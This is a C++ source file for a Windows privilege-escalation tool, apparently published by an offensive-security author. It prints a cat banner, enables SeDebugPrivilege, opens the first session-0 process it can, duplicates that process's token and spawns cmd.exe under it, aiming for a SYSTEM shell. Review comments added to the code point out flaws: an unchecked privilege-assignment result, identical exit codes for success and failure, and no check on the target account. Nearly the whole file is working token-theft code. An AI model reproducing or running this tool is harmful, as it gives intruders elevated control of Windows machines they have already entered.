#include <windows.h>
#include <iostream>
#include <tlhelp32.h>
/*
To compile on Linux an exe (lol)
x86_64-w64-mingw32-g++ -static-libgcc -static-libstdc++ priv.cpp -o priv.exe
Sets SE_DEBUG on self for dumping of procs.
Picks SYSTEM token. (0)
Snapshot + dump token.
Clones it.
Opens new proc with it.
*/
// Prints the banner (cat ASCII art, project URL and author line) to stdout.
// Output is fixed; nothing is read from the caller or the environment.
void displayCatArt() {
    static const char* const kBannerLines[] = {
        "\n\n",
        " _._ _,-'\"\"`-._\n",
        "(,-.`._,'( |\\`-/|\n",
        " `-.-' \\ )-`( , o o)\n",
        " `- \\`_`\"'-\n\n",
        " Meow.\n",
        "https://afflicted.sh/\n",
        "Written by: _SiCk\n\n",
    };
    for (const char* const line : kBannerLines) {
        std::cout << line;
    }
}
// Entry point; takes no arguments. Flow, all on the current thread:
//   1. print the banner;
//   2. enable SE_DEBUG_NAME on the current process's own token;
//   3. pick the first session-0 process that can be opened;
//   4. open that process's token and duplicate it into a primary token;
//   5. start cmd.exe under the duplicated token, then release handles.
// Each step is a distinct, auditable Win32 call (privilege adjustment, Toolhelp
// enumeration, cross-process OpenProcessToken, DuplicateTokenEx, CreateProcessWithTokenW).
// NOTE(review): step 2 can only succeed if SeDebugPrivilege is already assigned to the
// caller's token (normally only an elevated administrator token) — confirm for the context
// this is meant to run in.
// NOTE(review): every failure path returns 0, the same value as success, so the exit
// status cannot tell a caller whether a process was actually started.
int main() {
// Display cat art and info
displayCatArt();
// Enable debug privilege on our own token. TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY is the
// access AdjustTokenPrivileges needs.
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
std::cerr << "OpenProcessToken failed: " << GetLastError() << std::endl;
return 0;
}
// Only Privileges[0] is filled in; PrivilegeCount = 1 limits the API to that entry.
TOKEN_PRIVILEGES tk;
tk.PrivilegeCount = 1;
tk.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!LookupPrivilegeValue(nullptr, SE_DEBUG_NAME, &tk.Privileges[0].Luid)) {
std::cerr << "LookupPrivilegeValue failed: " << GetLastError() << std::endl;
CloseHandle(hToken);
return 0;
}
// NOTE(review): AdjustTokenPrivileges returns TRUE even when the privilege is not held by
// the token (GetLastError() == ERROR_NOT_ALL_ASSIGNED). That case is not checked here, so a
// caller lacking SeDebugPrivilege continues and only fails later, at OpenProcess or
// OpenProcessToken, with a less specific error.
if (!AdjustTokenPrivileges(hToken, FALSE, &tk, 0, nullptr, nullptr)) {
std::cerr << "AdjustTokenPrivileges failed: " << GetLastError() << std::endl;
CloseHandle(hToken);
return 0;
}
CloseHandle(hToken);
// Find a target process: Toolhelp snapshot of all processes; the first one whose session
// ID is 0 and which OpenProcess accepts with PROCESS_QUERY_INFORMATION wins. Nothing in this
// function checks which account the chosen process runs as — session 0 hosts services under
// several accounts, not only SYSTEM — so the token obtained later is whatever that first
// process happens to hold.
HANDLE process_handle = nullptr;
DWORD pid = 0;
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 processEntry;
processEntry.dwSize = sizeof(PROCESSENTRY32);   // required before Process32First
if (Process32First(snapshot, &processEntry)) {
do {
// Session 0 is the non-interactive services session.
DWORD sessionID;
if (ProcessIdToSessionId(processEntry.th32ProcessID, &sessionID) && sessionID == 0) {
pid = processEntry.th32ProcessID;
process_handle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
if (process_handle) {
break;   // first openable session-0 process; snapshot closed below
}
}
} while (Process32Next(snapshot, &processEntry));
}
CloseHandle(snapshot);
}
// NOTE(review): if the loop found nothing, GetLastError() here may reflect the last call
// that failed inside it (ProcessIdToSessionId, OpenProcess or Process32Next), or the
// snapshot failure, rather than a single identifiable cause.
if (!process_handle) {
std::cerr << "Failed to open target process: " << GetLastError() << std::endl;
return 0;
}
// Get the process token. TOKEN_DUPLICATE is what DuplicateTokenEx needs on the source
// token; TOKEN_ASSIGN_PRIMARY and TOKEN_QUERY are requested alongside it.
HANDLE process_token = nullptr;
if (!OpenProcessToken(process_handle, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &process_token)) {
std::cerr << "Failed to open process token: " << GetLastError() << std::endl;
CloseHandle(process_handle);
return 0;
}
// Duplicate the process token into a new primary token (TokenPrimary) with MAXIMUM_ALLOWED
// access and no explicit security attributes (nullptr → default descriptor).
HANDLE new_token = nullptr;
if (!DuplicateTokenEx(process_token, MAXIMUM_ALLOWED, nullptr, SecurityImpersonation, TokenPrimary, &new_token)) {
std::cerr << "Failed to duplicate token: " << GetLastError() << std::endl;
CloseHandle(process_token);
CloseHandle(process_handle);
return 0;
}
// Start the command prompt with the new token. lpApplicationName is nullptr, so "cmd.exe"
// is located by CreateProcess's search rules rather than by an absolute path.
// NOTE(review): lpCommandLine is documented as in/out (the API may write to it) and a
// string literal is passed — confirm the toolchain used accepts this conversion.
STARTUPINFOW si = { sizeof(STARTUPINFOW) };   // only cb is set; remaining fields are zero
PROCESS_INFORMATION pi = { 0 };
if (!CreateProcessWithTokenW(new_token, LOGON_WITH_PROFILE, nullptr, L"cmd.exe", CREATE_NEW_CONSOLE, nullptr, nullptr, &si, &pi)) {
std::cerr << "CreateProcessWithTokenW failed: " << GetLastError() << std::endl;
CloseHandle(new_token);
CloseHandle(process_token);
CloseHandle(process_handle);
return 0;
}
// Clean up. The child is not waited on, so it outlives this process; only our own handles
// to it and to the tokens are released here.
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(new_token);
CloseHandle(process_token);
CloseHandle(process_handle);
return 0;
}